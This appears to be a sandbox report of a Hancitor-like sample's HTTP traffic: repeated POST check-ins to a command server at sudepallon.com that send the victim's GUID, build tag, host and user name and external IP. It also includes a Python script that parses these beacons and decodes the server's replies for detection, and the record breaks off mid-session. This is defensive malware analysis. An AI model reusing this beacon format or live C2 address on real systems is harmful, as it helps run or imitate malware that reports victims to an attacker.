27 | 192.168.2.3 | 49781 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:03.457827091 CEST | 6054 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:03.525928974 CEST | 6054 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4e 4a 51 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cNJQMARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
28 | 192.168.2.3 | 49782 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:03.970303059 CEST | 6055 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:04.037123919 CEST | 6056 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 54 47 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMTGNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
29 | 192.168.2.3 | 49783 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe

Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:04.411729097 CEST | 6056 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:04.479322910 CEST | 6057 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 5a 41 5a 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cZAZAARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49757 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:53.509896040 CEST | 5499 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:53.576370001 CEST | 5505 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:31:55 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQKPJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
30 | 192.168.2.3 | 49784 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:04.784542084 CEST | 6057 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:04.851527929 CEST | 6058 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 4d 4b 50 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cMKPNARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
31 | 192.168.2.3 | 49785 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:05.179541111 CEST | 6059 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:05.246893883 CEST | 6059 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:06 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cCNMXARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
32 | 192.168.2.3 | 49786 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:05.567929029 CEST | 6060 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:05.634110928 CEST | 6060 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 4b 50 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBKPYARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
33 | 192.168.2.3 | 49787 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:05.990741968 CEST | 6061 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:06.056196928 CEST | 6061 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:07 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 42 5a 41 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cBZAYARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
34 | 192.168.2.3 | 49788 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:06.570564985 CEST | 6062 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:06.643687010 CEST | 6062 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 51 4b 50 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cQKPJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
35 | 192.168.2.3 | 49789 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:07.036962032 CEST | 6063 | OUT | POST /8/forum.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: sudepallon.com
Content-Length: 122
Cache-Control: no-cache
Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:07.106313944 CEST | 6063 | IN | HTTP/1.1 200 OK
Server: nginx/1.20.1
Date: Thu, 08 Jul 2021 14:32:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.45
Data Raw: 63 0d 0a 41 51 4a 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
Data Ascii: cAQJZARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
36 | 192.168.2.3 | 49790 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:07.823514938 CEST | 6064 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:07.890404940 CEST | 6065 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 4a 4d 4e 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cJMNQARRABw==0
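The check-in shape repeated in these sessions (a form-encoded POST to /8/forum.php carrying GUID, BUILD, INFO, EXT, IP, TYPE and WIN, answered with a short chunked base64 blob) can be parsed and checked mechanically. The script below is an added example written for this page, not code from Joe Sandbox or from the sample itself. It takes the session-36 request and reply as constructed byte strings transcribed from the capture (the request body is taken from the Data Raw hex, which keeps the real host\user name where the ASCII view shows computer\user), verifies Content-Length against the body, splits the seven beacon fields, dechunks and base64-decodes the reply, and then applies the 0x7A XOR that public Hancitor write-ups report for C2 replies. That XOR key, and the reading of the resulting {n:} as an empty-task reply, are assumptions taken from those write-ups; the page itself does not decode the reply. All function and field names are the example's own.

```python
"""Parse and decode one Hancitor check-in exchange from captured HTTP text.

Added example; request/response bytes are transcribed from the capture,
the XOR key and task meaning are assumptions from public write-ups.
"""
import base64
import re

# Constructed sample: the session-36 POST, with host\user taken from the hex
# dump rather than the anonymised "computer\user" shown in the ASCII view.
SAMPLE_REQUEST = (
    b"POST /8/forum.php HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko\r\n"
    b"Host: sudepallon.com\r\n"
    b"Content-Length: 122\r\n"
    b"Cache-Control: no-cache\r\n"
    b"\r\n"
    b"GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ DESKTOP-716T771\\hardz"
    b"&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)"
)
# Constructed sample: the matching chunked reply (Data Raw of the IN record).
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: nginx/1.20.1\r\n"
    b"Content-Type: text/html\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"c\r\nAQJZARRABw==\r\n0\r\n\r\n"
)

CHECKIN_FIELDS = ("GUID", "BUILD", "INFO", "EXT", "IP", "TYPE", "WIN")
# Assumption: public Hancitor analyses report the reply as base64 of the task
# XORed with 0x7A; this page does not decode the reply.
TASK_XOR_KEY = 0x7A
TASK_RE = re.compile(rb"\{[a-z]:[^{}]*\}")  # task shape "{<letter>:<argument>}"


def split_http(raw: bytes):
    """Split one HTTP message into (start line, lower-cased header dict, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_checkin(raw_request: bytes) -> dict:
    """Return the beacon fields of a Hancitor-style check-in POST.

    Raises ValueError when the message does not have the check-in shape
    (form POST, body length as declared, all seven fields present).
    """
    start, headers, body = split_http(raw_request)
    method, _path, _version = start.split(" ", 2)
    if method != "POST" or headers.get("content-type") != "application/x-www-form-urlencoded":
        raise ValueError("not a form-encoded POST")
    declared = int(headers.get("content-length", "-1"))
    if declared != len(body):
        raise ValueError(f"Content-Length {declared} does not match body of {len(body)} bytes")
    # The body is sent without percent-encoding (note the literal spaces and
    # backslash), so a plain split keeps the bytes as sent; parse_qs would
    # additionally decode '+' and '%xx'.
    fields = {}
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        fields[key] = value
    missing = [k for k in CHECKIN_FIELDS if k not in fields]
    if missing:
        raise ValueError(f"missing check-in fields: {missing}")
    # INFO is "<number> @ <host>\<user>"; expose host and user separately.
    _info_number, _, host_user = fields["INFO"].partition(" @ ")
    fields["host"], _, fields["user"] = host_user.partition("\\")
    return fields


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.index(b"\r\n", pos)
        size = int(body[pos:eol].split(b";")[0], 16)  # drop any chunk extension
        if size == 0:
            return bytes(out)
        out += body[eol + 2:eol + 2 + size]
        pos = eol + 2 + size + 2  # skip the chunk's trailing CRLF


def decode_task(raw_response: bytes) -> dict:
    """Dechunk, base64-decode and XOR-decode the C2 reply; extract the task."""
    _status, headers, body = split_http(raw_response)
    payload = dechunk(body) if headers.get("transfer-encoding") == "chunked" else body
    decoded = base64.b64decode(payload, validate=True)
    plain = bytes(b ^ TASK_XOR_KEY for b in decoded)
    match = TASK_RE.search(plain)
    return {
        "b64": payload.decode("ascii"),
        "raw_hex": decoded.hex(),
        "task": match.group(0).decode("latin-1") if match else None,
    }


if __name__ == "__main__":
    print(parse_checkin(SAMPLE_REQUEST))
    print(decode_task(SAMPLE_RESPONSE))
```

Every reply in this capture ends in the same base64 tail ARRABw==, so each decodes to the same {n:} task; only the three leading bytes change from poll to poll. A detection keyed on this traffic should therefore match the request side (the fixed field set, the literal " @ host\user" in INFO, the /forum.php POST with Cache-Control: no-cache) rather than the reply body.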


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
37 | 192.168.2.3 | 49791 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:08.232155085 CEST | 6065 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:08.301796913 CEST | 6066 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:09 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cHJQSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.3 | 49792 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:08.911281109 CEST | 6066 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:08.978708029 CEST | 6067 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cQZAJARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.3 | 49793 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:32:09.286073923 CEST | 6068 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:32:09.355176926 CEST | 6068 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:32:10 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/5.4.45
    Data Raw: 63 0d 0a 48 4e 4d 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
    Data Ascii: cHNMSARRABw==0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.3 | 49758 | 77.222.42.67 | 80 | C:\Users\Public\snd32sys.exe
Timestamp | kBytes transferred | Direction | Data
Jul 8, 2021 16:31:53.896061897 CEST | 5639 | OUT | POST /8/forum.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
    Host: sudepallon.com
    Content-Length: 122
    Cache-Control: no-cache
    Data Raw: 47 55 49 44 3d 38 30 32 33 32 32 38 38 33 33 36 37 32 37 32 31 36 34 34 26 42 55 49 4c 44 3d 30 37 30 37 69 6e 32 5f 77 76 63 72 26 49 4e 46 4f 3d 38 38 38 36 38 33 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 32 28 78 36 34 29
    Data Ascii: GUID=8023228833672721644&BUILD=0707in2_wvcr&INFO=888683 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=6.2(x64)
Jul 8, 2021 16:31:53.964401007 CEST | 5688 | IN | HTTP/1.1 200 OK
    Server: nginx/1.20.1
    Date: Thu, 08 Jul 2021 14:31:55 GMT
    Content-Type: text/html
